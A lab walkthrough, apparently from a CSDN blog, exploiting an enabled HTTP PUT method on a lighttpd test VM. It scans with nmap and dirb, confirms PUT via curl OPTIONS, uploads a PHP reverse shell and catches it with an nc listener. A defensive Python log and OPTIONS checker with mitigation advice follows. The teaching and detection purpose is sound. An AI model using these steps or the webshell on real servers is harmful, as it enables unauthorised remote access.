PUT middleware upload vulnerability

Principle of the PUT upload vulnerability

The middleware we commonly meet are Apache, Tomcat, IIS and WebLogic (strictly speaking, web containers). These middleware can be configured to support different HTTP methods. Each HTTP method has its own function; among them, PUT can upload a file directly from the client to the server. If the middleware has the HTTP PUT method enabled, a malicious attacker can upload a webshell directly to the corresponding server.

Target machine construction

Link: https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A
Extraction code: lsq0

Vulnerability reproduction

  1. Use netdiscover to find the live hosts
netdiscover -i eth0

  2. Use nmap to detect the services and other information on the target machine
nmap -sV 192.168.75.158
  • Found that the target uses the lighttpd middleware
  3. Use dirb to mine further information about the website
dirb http://192.168.75.158
  • Found a directory named test
  • Browsing to this directory shows no usable information
  4. Use OWASP ZAP to scan the test site; it reports a PUT vulnerability
  • Then use the curl command to send a request and check this vulnerability by hand
  • Note: even when a scanner does not show the vulnerability in a real engagement, we should still keep this line of testing in mind
curl -v -X OPTIONS http://192.168.75.158/test

Found that PUT is allowed for uploading files, which preliminarily verifies that there is a PUT upload vulnerability

  5. So we can upload a webshell to this directory
cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php
  • Edit the contents of shell.php; here I set the port to listen on to 443
  6. Use the Poster plug-in for Firefox to upload the webshell (only the old version of Firefox has the Poster plug-in)
  • Fill in the URL http://target machine address/test/ followed by the file name to save as, here rshell.php
  • Select the location of shell.php
  • Click PUT to upload
  7. After the upload succeeds, open a listener on port 443 in Kali
nc -nlvp 443
  • Click rshell.php, and the reverse connection gives us a shell
  • Enter python -c "import pty;pty.spawn('/bin/bash')" to upgrade the terminal
  • The system has been successfully penetrated

Summary: In real engagements the PUT upload vulnerability is a very common one, and we should keep this check in mind at all times.
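From the defender's side, the two artifacts of the procedure above are worth automating: the Allow header that the OPTIONS probe returns (step 4) and the PUT request that lands in the web server's access log (steps 6 and 7). The following script is an added example, not code from the original post or from any of the tools it mentions. It assumes a Common-Log-Format-style access log (lighttpd's default and Apache's combined format both fit the pattern used); the OPTIONS response text and the log lines are constructed sample data, not captures from the target machine.

```python
import re
from dataclasses import dataclass

# Methods that let a client write to the document root when the server maps
# them onto the filesystem: the page's PUT case plus its WebDAV siblings.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

# Extensions the server is likely to execute instead of serving as static data.
SCRIPT_EXTENSIONS = (".php", ".jsp", ".jspx", ".asp", ".aspx", ".cgi", ".pl", ".py")


def unsafe_methods_from_options(response_text: str) -> set:
    """Return the write-capable methods advertised by an OPTIONS response.

    `response_text` is the raw response (status line, headers, blank line),
    i.e. what `curl -v -X OPTIONS` prints; only the Allow header is read.
    """
    for line in response_text.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "allow":
            advertised = {m.strip().upper() for m in value.split(",") if m.strip()}
            return advertised & WRITE_METHODS
    return set()


# CLF-style line: client, two single-token fields, [timestamp], "METHOD path proto", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class WriteEvent:
    ip: str
    timestamp: str
    method: str
    path: str
    status: int
    created: bool        # the server answered 2xx, so the write most likely succeeded
    script_upload: bool  # the target path looks like server-side code


def find_write_events(log_lines):
    """Scan access-log lines and return every write-method request found."""
    events = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") not in WRITE_METHODS:
            continue
        status = int(m.group("status"))
        path = m.group("path").split("?", 1)[0]
        events.append(WriteEvent(
            ip=m.group("ip"), timestamp=m.group("ts"), method=m.group("method"),
            path=path, status=status,
            created=200 <= status < 300,
            script_upload=path.lower().endswith(SCRIPT_EXTENSIONS),
        ))
    return events


# Constructed sample OPTIONS response, shaped like the one the curl probe in step 4 elicits.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: GET, HEAD, POST, OPTIONS, PUT, DELETE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed sample access-log lines (client address and times are made up).
SAMPLE_LOG_LINES = [
    '192.168.75.130 - - [11/Jan/2021:16:02:11 +0800] "GET /test/ HTTP/1.1" 200 312',
    '192.168.75.130 - - [11/Jan/2021:16:05:40 +0800] "OPTIONS /test HTTP/1.1" 200 0',
    '192.168.75.130 - - [11/Jan/2021:16:06:02 +0800] "PUT /test/rshell.php HTTP/1.1" 201 0',
    '192.168.75.130 - - [11/Jan/2021:16:06:30 +0800] "GET /test/rshell.php HTTP/1.1" 200 0',
    '192.168.75.130 - - [11/Jan/2021:16:07:01 +0800] "PUT /test/notes.txt HTTP/1.1" 403 345',
]

if __name__ == "__main__":
    risky = unsafe_methods_from_options(SAMPLE_OPTIONS_RESPONSE)
    print("write methods advertised:", sorted(risky) or "none")
    for ev in find_write_events(SAMPLE_LOG_LINES):
        level = "ALERT" if ev.created and ev.script_upload else "info"
        print(f"[{level}] {ev.timestamp} {ev.ip} {ev.method} {ev.path} -> {ev.status}")
```

A successful PUT of a script file (2xx status on a `.php`/`.jsp`-style path) is the event to alert on; a rejected PUT (403, 405) still tells you someone is probing for the weakness. The proper fix remains server-side: leave only GET, HEAD and POST enabled for content directories and keep WebDAV modules disabled unless a directory genuinely needs them.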

Origin blog.csdn.net/weixin_45007073/article/details/112574462